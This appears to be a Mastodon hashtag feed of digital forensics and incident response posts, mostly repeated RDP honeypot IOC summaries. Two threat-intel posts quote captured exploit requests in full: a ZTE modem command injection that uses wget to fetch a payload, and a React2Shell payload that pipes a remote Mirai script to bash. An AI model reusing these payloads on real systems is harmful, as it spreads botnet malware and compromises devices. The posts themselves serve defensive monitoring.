Belkasoft CEO Yuri Gubanov discusses the company's current line-up of products, how AI can be used in investigations, and the evolving challenges facing digital forensic investigators worldwide. https://www.forensicfocus.com/interviews/yuri-gubanov-founder-and-ceo-belkasoft/ #Belkasoft #DigitalForensics #DFIR #AI
#Dfir
Investigation Scenario 🔎
A host on your network executed the command “netsh wlan show profile” for the first time.
What do you look for to investigate whether an incident occurred?
2026-03-09 RDP #Honeypot IOCs - 159 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
143.198.30.243 - 45
80.94.95.221 - 18
111.170.152.113 - 15
Top ASNs:
AS14061 - 45
AS396982 - 36
AS204428 - 18
Top Accounts:
hello - 63
Administr - 30
Test - 24
Top ISPs:
DigitalOcean, LLC - 45
Google LLC - 36
SS-Net - 18
Top Clients:
Unknown - 159
Top Software:
Unknown - 159
Top Keyboards:
Unknown - 159
Top IP Classification:
hosting - 87
Unknown - 66
mobile - 3
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
2026-03-09 RDP #Honeypot IOCs - 106 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
143.198.30.243 - 30
80.94.95.221 - 12
111.170.152.113 - 10
Top ASNs:
AS14061 - 30
AS396982 - 24
AS204428 - 12
Top Accounts:
hello - 42
Administr - 20
Test - 16
Top ISPs:
DigitalOcean, LLC - 30
Google LLC - 24
SS-Net - 12
Top Clients:
Unknown - 106
Top Software:
Unknown - 106
Top Keyboards:
Unknown - 106
Top IP Classification:
hosting - 58
Unknown - 44
mobile - 2
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
2026-03-09 RDP #Honeypot IOCs - 53 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
143.198.30.243 - 15
80.94.95.221 - 6
111.170.152.113 - 5
Top ASNs:
AS14061 - 15
AS396982 - 12
AS204428 - 6
Top Accounts:
hello - 21
Administr - 10
Test - 8
Top ISPs:
DigitalOcean, LLC - 15
Google LLC - 12
SS-Net - 6
Top Clients:
Unknown - 53
Top Software:
Unknown - 53
Top Keyboards:
Unknown - 53
Top IP Classification:
hosting - 29
Unknown - 22
mobile - 1
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
New Huntress case study breaks down a MuddyWater-aligned (Iran) intrusion: RDP initial access, SSH tunneling with OpenSSH, & DLL side-loading via legitimate FMAPP.exe for C2. Great case study and walkthrough. #CyberSecurity #DFIR #MuddyWater #Huntress đź”—https://zurl.co/AC8Re
172.245.21[.]30 is trying to exploit CVE-2014-2321, ZTE F460 and F660 cable modems RCE with the command:
POST /web_shell_cmd.gch post_input IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=wget+hXXp://107.172.79[.]248+ins/mips+-O+/var/tmp/init.norm&CmdAck="
Target 107.172.79[.]248 is currently rejecting connection
43.228.157[.]64 is trying to exploit CVE-2025-55182 (React2Shell) to spread Mirai Botnet Malware with the command:
POST /api/action 443 posted 0={"_response":{"_formData":{"get":"$1:constructor:constructor"},"_prefix":"var+res+=+process.mainModule.require('child_process').execSync('wget+-qO+-+hXXp://83.142.209[.]47/x+|+bash;+curl+-sLk+hXXp://83.142.209[.]47/x+|+bash',{timeout:5000}).toString().trim();+throw+Object.assign(new+Error('NEXT_REDIRECT'),+{digest:`${res}`});"},"reason":-1,"status":"resolved_model","then":"$1:__proto__:then","value":"{\"then\":+\"$B0\"}"}&1="$@0""
hXXp://83.142.209[.]47/x is a bash script that downloads and executes Mirai variants for different architectures.
2026-03-08 RDP #Honeypot IOCs - 207 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
80.94.95.221 - 93
194.165.16.165 - 12
66.175.211.81 - 12
Top ASNs:
AS204428 - 93
AS396982 - 36
AS48721 - 12
Top Accounts:
Administr - 99
Domain - 27
Test - 18
Top ISPs:
SS-Net - 93
Google LLC - 36
Flyservers S.A. - 12
Top Clients:
Unknown - 207
Top Software:
Unknown - 207
Top Keyboards:
Unknown - 207
Top IP Classification:
Unknown - 138
hosting - 60
proxy - 9
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
2026-03-08 RDP #Honeypot IOCs - 138 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
80.94.95.221 - 62
194.165.16.165 - 8
66.175.211.81 - 8
Top ASNs:
AS204428 - 62
AS396982 - 24
AS48721 - 8
Top Accounts:
Administr - 66
Domain - 18
Test - 12
Top ISPs:
SS-Net - 62
Google LLC - 24
Flyservers S.A. - 8
Top Clients:
Unknown - 138
Top Software:
Unknown - 138
Top Keyboards:
Unknown - 138
Top IP Classification:
Unknown - 92
hosting - 40
proxy - 6
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
2026-03-08 RDP #Honeypot IOCs - 69 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
80.94.95.221 - 31
194.165.16.165 - 4
66.175.211.81 - 4
Top ASNs:
AS204428 - 31
AS396982 - 12
AS48721 - 4
Top Accounts:
Administr - 33
Domain - 9
Test - 6
Top ISPs:
SS-Net - 31
Google LLC - 12
Flyservers S.A. - 4
Top Clients:
Unknown - 69
Top Software:
Unknown - 69
Top Keyboards:
Unknown - 69
Top IP Classification:
Unknown - 46
hosting - 20
proxy - 3
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
Week 10 - 2026 #DFIR
If you’re a macOS user supporting with Windows digital forensics, you’ll love IRFlow Timeline:
“A high-performance native macOS application for DFIR timeline analysis. Built on Electron + SQLite to handle large files for forensic timelines (CSV, TSV, XLSX, EVTX, Plaso) without breaking a sweat. Inspired by Eric Zimmerman's Timeline Explorer for Windows.”
2026-03-07 RDP #Honeypot IOCs - 318 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
52.159.76.8 - 177
143.198.30.243 - 42
80.94.95.221 - 18
Top ASNs:
AS8075 - 177
AS14061 - 42
AS396982 - 36
Top Accounts:
hello - 228
Administr - 33
Test - 12
Top ISPs:
Microsoft Corporation - 177
DigitalOcean, LLC - 42
Google LLC - 36
Top Clients:
Unknown - 318
Top Software:
Unknown - 318
Top Keyboards:
Unknown - 318
Top IP Classification:
hosting - 258
Unknown - 48
proxy - 12
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
2026-03-07 RDP #Honeypot IOCs - 212 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
52.159.76.8 - 118
143.198.30.243 - 28
80.94.95.221 - 12
Top ASNs:
AS8075 - 118
AS14061 - 28
AS396982 - 24
Top Accounts:
hello - 152
Administr - 22
Test - 8
Top ISPs:
Microsoft Corporation - 118
DigitalOcean, LLC - 28
Google LLC - 24
Top Clients:
Unknown - 212
Top Software:
Unknown - 212
Top Keyboards:
Unknown - 212
Top IP Classification:
hosting - 172
Unknown - 32
proxy - 8
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
2026-03-07 RDP #Honeypot IOCs - 106 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
52.159.76.8 - 59
143.198.30.243 - 14
80.94.95.221 - 6
Top ASNs:
AS8075 - 59
AS14061 - 14
AS396982 - 12
Top Accounts:
hello - 76
Administr - 11
Test - 4
Top ISPs:
Microsoft Corporation - 59
DigitalOcean, LLC - 14
Google LLC - 12
Top Clients:
Unknown - 106
Top Software:
Unknown - 106
Top Keyboards:
Unknown - 106
Top IP Classification:
hosting - 86
Unknown - 16
proxy - 4
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
2026-03-06 RDP #Honeypot IOCs - 204 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
71.6.134.235 - 30
42.193.196.87 - 21
2.57.121.22 - 15
Top ASNs:
AS396982 - 48
AS10439 - 30
AS45090 - 21
Top Accounts:
hello - 45
Administr - 36
Test - 27
Top ISPs:
Google LLC - 48
CariNet, Inc. - 30
China Internet Network Information Center - 21
Top Clients:
Unknown - 204
Top Software:
Unknown - 204
Top Keyboards:
Unknown - 204
Top IP Classification:
Unknown - 99
hosting - 69
hosting & proxy - 30
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
2026-03-06 RDP #Honeypot IOCs - 136 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
71.6.134.235 - 20
42.193.196.87 - 14
2.57.121.22 - 10
Top ASNs:
AS396982 - 32
AS10439 - 20
AS45090 - 14
Top Accounts:
hello - 30
Administr - 24
Test - 18
Top ISPs:
Google LLC - 32
CariNet, Inc. - 20
China Internet Network Information Center - 14
Top Clients:
Unknown - 136
Top Software:
Unknown - 136
Top Keyboards:
Unknown - 136
Top IP Classification:
Unknown - 66
hosting - 46
hosting & proxy - 20
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
2026-03-06 RDP #Honeypot IOCs - 68 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec
Top IPs:
71.6.134.235 - 10
42.193.196.87 - 7
2.57.121.22 - 5
Top ASNs:
AS396982 - 16
AS10439 - 10
AS45090 - 7
Top Accounts:
hello - 15
Administr - 12
Test - 9
Top ISPs:
Google LLC - 16
CariNet, Inc. - 10
China Internet Network Information Center - 7
Top Clients:
Unknown - 68
Top Software:
Unknown - 68
Top Keyboards:
Unknown - 68
Top IP Classification:
Unknown - 33
hosting - 23
hosting & proxy - 10
Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key
Client Info
Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst